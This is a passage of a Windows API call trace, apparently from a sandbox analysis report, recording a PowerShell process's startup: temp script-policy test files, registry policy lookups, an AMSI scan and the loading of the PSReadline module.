CloseHandle (hObject=0x6f0) returned 1 [0245.963] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0245.963] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", lpFilePart=0x0) returned 0x49 [0245.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e610) returned 1 [0245.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_1xkv2x4g.ef0.psm1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6f0 [0245.964] GetFileType (hFile=0x6f0) returned 0x1 [0245.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e60c) returned 1 [0245.964] GetFileType (hFile=0x6f0) returned 0x1 [0245.964] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b2dea4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x7c0e68c, lpOverlapped=0x0 | out: lpBuffer=0x4b2dea4*, lpNumberOfBytesWritten=0x7c0e68c*=0x1, lpOverlapped=0x0) returned 1 [0245.965] CloseHandle (hObject=0x6f0) returned 1 [0245.967] CoTaskMemAlloc (cb=0x92) returned 0x851660 [0245.967] IdentifyCodeAuthzLevelW () returned 0x1 [0246.069] CoTaskMemFree (pv=0x851660) [0246.069] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0246.070] CloseCodeAuthzLevel () returned 0x1 [0246.071] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0246.071] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", nBufferLength=0x49, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", lpFilePart=0x0) returned 0x48 [0246.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e6d0) returned 1 [0246.071] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_shgafj41.m2j.ps1"), fInfoLevelId=0x0, lpFileInformation=0x7c0e74c | out: lpFileInformation=0x7c0e74c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe225202d, ftCreationTime.dwHighDateTime=0x1d608b7, ftLastAccessTime.dwLowDateTime=0xe225202d, ftLastAccessTime.dwHighDateTime=0x1d608b7, ftLastWriteTime.dwLowDateTime=0xe225202d, ftLastWriteTime.dwHighDateTime=0x1d608b7, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0246.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e6cc) returned 1 [0246.071] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0246.071] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", nBufferLength=0x49, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1", lpFilePart=0x0) returned 0x48 [0246.072] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_shgafj41.m2j.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_shgafj41.m2j.ps1")) returned 1 [0246.073] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0246.073] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", lpFilePart=0x0) returned 0x49 [0246.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e6d0) returned 1 [0246.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_1xkv2x4g.ef0.psm1"), fInfoLevelId=0x0, lpFileInformation=0x7c0e74c | out: lpFileInformation=0x7c0e74c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe225202d, ftCreationTime.dwHighDateTime=0x1d608b7, ftLastAccessTime.dwLowDateTime=0xe225202d, ftLastAccessTime.dwHighDateTime=0x1d608b7, ftLastWriteTime.dwLowDateTime=0xe225202d, ftLastWriteTime.dwHighDateTime=0x1d608b7, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0246.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e6cc) returned 1 [0246.073] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0246.073] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1", lpFilePart=0x0) returned 0x49 [0246.074] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1xkv2x4g.ef0.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_1xkv2x4g.ef0.psm1")) returned 1 [0246.076] GetSystemInfo (in: lpSystemInfo=0x7c0e784 | out: lpSystemInfo=0x7c0e784*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0246.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0e714 | out: phkResult=0x7c0e714*=0x6f4) returned 0x0 [0246.077] RegQueryValueExW (in: hKey=0x6f4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x7c0e730, lpData=0x0, lpcbData=0x7c0e72c*=0x0 | out: lpType=0x7c0e730*=0x0, lpData=0x0, lpcbData=0x7c0e72c*=0x0) returned 0x2 [0246.077] RegCloseKey (hKey=0x6f4) returned 0x0 [0246.089] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0246.089] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0246.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e68c) returned 1 [0246.090] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6f4 [0246.090] GetFileType (hFile=0x6f4) returned 0x1 [0246.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e688) returned 1 [0246.090] GetFileType (hFile=0x6f4) returned 0x1 [0246.090] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x7c0e6c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x7c0e6c8*=0) returned 0x0 [0246.090] ReadFile (in: hFile=0x6f4, lpBuffer=0x4b306a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7c0e6f4, lpOverlapped=0x0 | out: lpBuffer=0x4b306a0*, lpNumberOfBytesRead=0x7c0e6f4*=0x2f6, lpOverlapped=0x0) returned 1 [0246.090] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x7c0e6c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x7c0e6c8*=0) returned 0x2f6 [0246.090] ReadFile (in: hFile=0x6f4, lpBuffer=0x4b306a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7c0e6f4, lpOverlapped=0x0 | out: lpBuffer=0x4b306a0*, lpNumberOfBytesRead=0x7c0e6f4*=0x0, lpOverlapped=0x0) returned 1 [0246.091] CoTaskMemAlloc (cb=0x20c) returned 0x6db3a80 [0246.091] GetSystemDirectoryW (in: lpBuffer=0x6db3a80, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0246.091] CoTaskMemFree (pv=0x6db3a80) [0246.091] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0246.091] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0246.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e628) returned 1 [0246.091] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x7c0e6a4 | out: lpFileInformation=0x7c0e6a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0246.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e624) returned 1 [0246.092] GetSystemInfo (in: lpSystemInfo=0x7c0e6d8 | out: lpSystemInfo=0x7c0e6d8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0246.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0e668 | out: phkResult=0x7c0e668*=0x6f0) returned 0x0 [0246.093] RegQueryValueExW (in: hKey=0x6f0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x7c0e684, lpData=0x0, lpcbData=0x7c0e680*=0x0 | out: lpType=0x7c0e684*=0x0, lpData=0x0, lpcbData=0x7c0e680*=0x0) returned 0x2 [0246.093] RegCloseKey (hKey=0x6f0) returned 0x0 [0246.094] CloseHandle (hObject=0x6f4) returned 1 [0246.108] CoCreateGuid (in: pguid=0x7c0e028 | out: pguid=0x7c0e028*(Data1=0x6068c2b0, Data2=0xc835, Data3=0x41f7, Data4=([0]=0xba, [1]=0x96, [2]=0x8d, [3]=0x4f, [4]=0xc9, [5]=0xc2, [6]=0x51, [7]=0xd4))) returned 0x0 [0246.115] CoCreateGuid (in: pguid=0x7c0e758 | out: pguid=0x7c0e758*(Data1=0x6218c359, Data2=0x6592, Data3=0x4b31, Data4=([0]=0xbc, [1]=0xfd, [2]=0xc, [3]=0xb9, [4]=0x5b, [5]=0x98, [6]=0xaf, [7]=0xcd))) returned 0x0 [0246.139] QueryPerformanceFrequency (in: lpFrequency=0xa94da0 | out: lpFrequency=0xa94da0*=100000000) returned 1 [0246.140] QueryPerformanceCounter (in: lpPerformanceCount=0x7c0e4b8 | out: lpPerformanceCount=0x7c0e4b8*=34117439398) returned 1 [0246.141] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0246.141] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0246.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0e3ec) returned 1 [0246.141] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x7c0e468 | out: lpFileInformation=0x7c0e468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0246.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0e3e8) returned 1 [0246.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0246.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0246.143] AmsiOpenSession () returned 0x0 [0246.144] AmsiScanString () returned 0x80070015 [0246.367] QueryPerformanceCounter (in: lpPerformanceCount=0x7c0e480 | out: lpPerformanceCount=0x7c0e480*=34140171934) returned 1 [0246.383] EtwEventRegister (in: ProviderId=0x4b45360, EnableCallback=0x4532dfe, CallbackContext=0x0, RegHandle=0x4b4533c | out: RegHandle=0x4b4533c) returned 0x0 [0246.383] EtwEventSetInformation (RegHandle=0x6dea9b8, InformationClass=0x62, EventInformation=0x2, InformationLength=0x4b45300) returned 0x0 [0246.384] EnumerateTraceGuidsEx () returned 0x0 [0246.385] GetCurrentProcessId () returned 0x13b8 [0246.391] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Winevt\\Publishers\\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d4cc | out: phkResult=0x7c0d4cc*=0x0) returned 0x2 [0246.473] GetCurrentProcessId () returned 0x13b8 [0246.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0e40c | out: phkResult=0x7c0e40c*=0x0) returned 0x2 [0246.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0e40c | out: phkResult=0x7c0e40c*=0x0) returned 0x2 [0246.563] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\en-US\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\en-us\\psreadline.psd1")) returned 0xffffffff [0246.564] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\en\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\en\\psreadline.psd1")) returned 0xffffffff [0246.619] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0246.623] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0246.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0246.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0246.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0246.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2", nBufferLength=0x3a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2", lpFilePart=0x0) returned 0x39 [0246.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0ddac | out: phkResult=0x7c0ddac*=0x758) returned 0x0 [0246.644] RegQueryValueExW (in: hKey=0x758, lpValueName="Install", lpReserved=0x0, lpType=0x7c0ddc0, lpData=0x0, lpcbData=0x7c0ddbc*=0x0 | out: lpType=0x7c0ddc0*=0x4, lpData=0x0, lpcbData=0x7c0ddbc*=0x4) returned 0x0 [0246.644] RegQueryValueExW (in: hKey=0x758, lpValueName="Install", lpReserved=0x0, lpType=0x7c0ddc0, lpData=0x7c0ddac, lpcbData=0x7c0ddbc*=0x4 | out: lpType=0x7c0ddc0*=0x4, lpData=0x7c0ddac*=0x1, lpcbData=0x7c0ddbc*=0x4) returned 0x0 [0246.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0246.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml", nBufferLength=0x4e, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x4d [0246.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0ddec) returned 1 [0246.816] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSGetModuleInfo.xml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x7c0de68 | out: lpFileInformation=0x7c0de68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0246.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0dde8) returned 1 [0246.817] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\microsoft.powershell.psreadline.dll")) returned 0x20 [0246.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0246.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0246.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0246.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0247.060] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x6d829c0*=0x680, lpdwindex=0x7c0bb74 | out: lpdwindex=0x7c0bb74) returned 0x0 [0247.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0247.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0247.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0247.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", nBufferLength=0x5e, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\Microsoft.PowerShell.PSReadLine.dll", lpFilePart=0x0) returned 0x5d [0248.109] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psm1")) returned 0x20 [0248.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0248.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", nBufferLength=0x4a, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0248.110] CoTaskMemAlloc (cb=0x20c) returned 0x7e17300 [0248.110] GetSystemDirectoryW (in: lpBuffer=0x7e17300, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0248.110] CoTaskMemFree (pv=0x7e17300) [0248.110] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0248.110] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0248.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7c0d974) returned 1 [0248.110] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x7c0d9f0 | out: lpFileInformation=0x7c0d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0248.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c0d970) returned 1 [0248.110] GetSystemInfo (in: lpSystemInfo=0x7c0da24 | out: lpSystemInfo=0x7c0da24*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0248.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x7c0d9b4 | out: 